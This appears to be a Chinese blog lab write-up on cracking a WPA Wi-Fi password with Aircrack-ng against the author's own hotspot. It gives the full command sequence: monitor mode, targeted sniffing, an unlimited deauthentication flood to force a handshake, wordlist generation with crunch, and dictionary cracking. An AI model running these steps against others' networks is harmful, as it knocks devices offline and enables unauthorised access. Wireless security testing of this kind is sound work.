基于Airocrack-ng套件的无线网络攻击和密码破解


免责声明:本文设计的任何无线网络攻击知识请勿于生活中进行尝试!如继续阅读本文则视为承诺发生任何违法后果与本文作者无关!

实现原理:

利用配有无线破解工具(或后期自行安装)的开发版Linux(典型值如Kali、CDLinux等)和具有监听功能的无线网卡对附近的无线网络数据进行诱骗、抓包、跑包、流量分析等操作,并实现基础的无线网络攻击、数据分析、密码破解等操作。

什么是握手包:无线信号是加密的,如果你要连接无线路由器,就要给路由器发送一个请求,请求和无线路由器建立连接,这个请求就在一个你要发送的数据包里,学名叫握手包,这个包里面包含了你发送过去的一个密码,但是这个密码是加密的。

所以我们要破解的无线网络连接我们首先要抓到这个包,里面有加密过的密码,我们只要抓到这个包,再用电脑根据这个加密后的数据反算密码就行了。

而握手包只在设备与路由器刚开始连接的时候由设备发送给路由器,认证成功后就不再发送了,所以我们要想抓住这个包我们必须等到有设备和路由器刚要建立连接时来抓,当然我们有更好的方法,就是用一个方法断开一个已经连接到路由器的设备,等它再自动和路由器连接的时候抓住那个握手包。

跑包:跑包就是用同样的算法把字典里的密码加密,然后将结果与握手包里的密文进行比对如果一样那么也就知道了原密码说白了就是拿密码一个个的试,看看哪个是对的。

因此跑包能不能跑出来完全取决你的字典里有没有包含真正的密码。还取决于你的电脑配置够不够强,能不能在可以等待的时间内跑完字典。

实验环境:

  • Kali Linux
  • 物理机Mac OS Big Sur 11.2.3
  • 手机热点
  • RT5370 渗透免驱网卡

    实验步骤

以下操作均需要root权限

1.无线攻击

查看当前无线网卡名称

iwconfig

其中eth0为虚拟机本地网卡,lo为回环网卡

为排除其他进程占用无线网卡或端口干扰,使用如下命令关闭关联进程

airmon-ng check kill

打开网卡的监听模式

airmon-ng start wlan0

此处wlan0为我的无线网卡

可以发现侦听网卡已经开始工作,且网卡名变为wlan0mon

开启无线网卡嗅探

airodump-ng wlan0mon

此处我们需要记住BSSID(MAC地址)和CH信道
此处以子非鱼的SE2020为例

另外打开一个终端,对目标WLAN进行嗅探

airodump-ng --bssid 76:C1:50:31:54:FD -c 6 -w test wlan0mon

其中test为攻击过程中获得的数据包的保存名称,默认保存在/home/user


发现连接当前无线AP的有一台设备,目标MAC为STATION(B8:09:8A:51:44:3B)

由于iPhone默认使用WAPI因此MAC地址会发生改变,因此此处的BSSID与上图不一致

键入如下命令对目标设备进行无线攻击并尝试获取握手包

aireplay-ng -0 0 -a DE:9E:DE:E5:0A:50 -t B8:09:8A:51:44:3B wlan0mon

其中第二个0表示发送数据包的个数,当数值为0时表示无线发送数据包

我们在设备嗅探处发现其信号强度(PWR)为0,表示对方已经断网


通过将该设备断网让其自动重连可获得握手包

注意:扫描时看到输出的扫描状态是这样的:
CH 5 ][ Elapsed: 12 s ][ 2021-10-07 18:49
只有当扫描状态后面出现 ][ WPA handshake: 22:47:DA:62:2A:F0 后,我们才拿到可以进行破解的握手包。

2.密码破解(跑包)

如有现成的字典文件可以直接使用
此处以生成一个简单的字典为例
为了实验的简化,默认已经知道密码为12138888

crunch 8 8 1238 -o test.txt

第一个8表示最小长度
第二个8表示最大长度
1238表示密码元素
test.txt表示生成的字典文件的名字

最后进行爆破

aircrack-ng -w test.txt test-01.cap

-w为字典路径


Key Found ! 12138888


Author: xzajyjs
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint polocy. If reproduced, please indicate source xzajyjs !
评论
  TOC